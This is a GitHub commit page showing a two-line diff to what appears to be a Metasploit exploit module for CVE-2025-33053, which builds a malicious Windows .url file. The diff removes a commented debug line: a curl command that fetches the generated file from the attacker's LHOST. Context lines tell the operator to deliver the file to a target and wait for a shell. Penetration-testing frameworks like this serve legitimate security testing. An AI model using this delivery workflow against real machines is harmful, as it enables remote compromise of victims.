Skip to content

Commit dd6bb2c

Browse files
committed
Remove debug statements
1 parent 3d9cc60 commit dd6bb2c

File tree

1 file changed

+0
-2
lines changed

1 file changed

+0
-2
lines changed

modules/exploits/windows/fileformat/cve_2025_33053.rb

Lines changed: 0 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -86,8 +86,6 @@ def write_url_file
8686
outfile = %(#{Rex::Text.rand_text_alphanumeric(8)}.url)
8787
path = store_local('webdav.url', nil, content, outfile)
8888
print_status("URL file: #{path}, deliver to target's machine and wait for shell")
89-
# debug stuff
90-
# print_status("Run following: curl http://#{datastore['LHOST']}:8080/#{outfile} -o #{outfile}")
9189
end
9290

9391
def generate_url_content

0 commit comments

Comments
 (0)